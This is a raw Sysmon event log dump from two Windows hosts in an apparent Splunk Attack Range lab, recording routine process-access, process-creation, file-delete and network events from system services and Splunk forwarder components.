07:53:02.170{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103937Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:02.170{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103936Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:02.170{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B2DE-615A-DE01-00000000FC01}5748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103935Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:02.170{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2DE-615A-DE01-00000000FC01}5748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103934Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:02.171{58E9C193-B2DE-615A-DE01-00000000FC01}5748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000103963Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.935{58E9C193-B2DF-615A-E001-00000000FC01}50604448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103962Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC90BD880ADD2257405E2378CB2FC520,SHA256=1862CFE530C4860AF6ED637340071CBCA13BAE0AC68E19583E54A5B228500F90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081826Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:03.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CB621C7B1CD91F6EE318BEC8754E73C,SHA256=BCE1177BD1622B32D02A55FB860AC3AF24051B69A22259D8D16E6F318E2776BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103961Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.701{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2DF-615A-E001-00000000FC01}5060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103960Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.701{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103959Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.701{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103958Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.701{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103957Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.701{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103956Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.701{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B2DF-615A-E001-00000000FC01}5060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103955Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.701{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2DF-615A-E001-00000000FC01}5060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103954Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.702{58E9C193-B2DF-615A-E001-00000000FC01}5060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000103953Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.420{58E9C193-B2DF-615A-DF01-00000000FC01}5516904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103952Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.295{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95F51247DAC2A5B22E82430E0EEFFAB4,SHA256=52D3A8055AA2E0B6C6D8AB969EDE13F72A6D9B0623DF7354FC076B77B6D5D829,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103951Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.185{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2DF-615A-DF01-00000000FC01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103950Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.185{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103949Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.185{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103948Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.185{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103947Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.185{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103946Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.185{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B2DF-615A-DF01-00000000FC01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103945Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.185{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2DF-615A-DF01-00000000FC01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103944Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:03.186{58E9C193-B2DF-615A-DF01-00000000FC01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103965Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:04.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C1A4C1F46A383EB2FC81C3F7DBE837F,SHA256=E55B22531D1E92A161FEED655D3C52E5B4AAC7D215FA414F29CE6EFE340B46ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081827Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:04.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6DDB24F71676ECF1D90F2FFD3D2BDD0,SHA256=D99D9DF99E9B0DB8C08AA8867747CBB3F1AF890A0E0F6F06FD4334BB5966C22C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103964Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:04.717{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BFC7D6428A1217E97ED457B092CCED3,SHA256=0783818D67F17BE99A21B319335ED85DE04A0A0D198B2F343F2929DE91504C56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103974Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:05.842{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C52876AC33EDE7FC0442B78A36B11E87,SHA256=BACBD2C60D8570BE477F1906B774A4D09B1D76A63E1DDBABF53378F810784E8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081829Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:03.729{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50056-false10.0.1.12-8000- 23542300x800000000000000081828Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:05.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57846219523D650BC787E6D708D6B8FA,SHA256=110CD0254619444F7273748CC8981B538A2C925CBD24AE15B3DDE51F3E2F9D35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103973Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:05.342{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2E1-615A-E101-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 